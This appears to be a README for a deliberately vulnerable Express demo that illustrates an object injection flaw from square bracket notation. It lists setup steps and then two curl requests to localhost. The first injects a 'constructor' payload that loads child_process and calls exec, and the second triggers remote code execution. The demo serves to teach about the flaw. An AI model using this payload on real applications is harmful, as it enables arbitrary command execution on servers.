A prototype to demonstrate the dangers of square bracket notation using object injection attack. It is inspired by this article from ESLint Security. This article was originally written by Jon Lamendola for ^Lift Security.
-
Install nodejs
-
clone repository
$ git clone https://github.com/0xdbe/express-object-injection.git
$ cd express-object-injection- Install express
$ npm install- Start application
$ node index.js- Setting a malicious fuction as constructor
$ curl http://localhost:3000/api/user \
-H 'Content-Type: application/json' \
--data '["constructor", "var require = global.require || global.process.mainModule.constructor._load;require(\"child_process\").exec(arguments[0], console.log)"]'- Call the malicious function allowing a remote code execute (RCE)
$ curl http://localhost:3000/api/user \
-H 'Content-Type: application/json' \
--data '["anyVal", "date"]'note: this vulnerable function is not detected by ESLint Security !!